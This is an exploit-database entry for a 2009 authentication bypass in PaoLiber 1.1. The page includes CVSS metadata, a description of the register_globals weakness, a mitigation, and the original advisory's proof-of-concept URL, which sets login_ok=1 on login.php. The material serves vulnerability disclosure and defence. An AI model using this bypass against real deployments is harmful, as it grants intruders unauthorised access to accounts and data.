header-logo
Suggest Exploit
vendor:
PaoLiber
by:
SirGod
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: PaoLiber
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:paoliber:paoliber:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability

PaoLiber 1.1 is vulnerable to an authentication bypass vulnerability due to the register_globals setting being set to 'on'. An attacker can exploit this vulnerability by sending a crafted HTTP request with the parameter 'login_ok' set to '1' to the vulnerable application.

Mitigation:

Disable register_globals in the php.ini configuration file.
Source

Exploit-DB raw data:

#############################################################################
[+] PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#############################################################################

download : http://zenas.org/paobacheca/download/scarica.html

[+] Authentication Bypass Vulnerability


 - Notes : register_globals = on


 - PoC :

     http://127.0.0.1/[path]/login.php?login_ok=1

#############################################################################

# milw0rm.com [2009-07-28]

Navigation

Suggest Exploit

Services By CQR